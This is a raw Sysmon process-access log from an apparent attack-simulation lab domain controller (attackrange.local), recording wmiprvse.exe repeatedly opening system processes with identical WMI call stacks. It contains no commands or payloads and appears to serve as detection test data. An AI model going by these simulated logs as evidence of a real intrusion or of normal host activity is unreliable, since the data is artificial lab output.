10341000x80000000000000002246988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.640{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.624{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 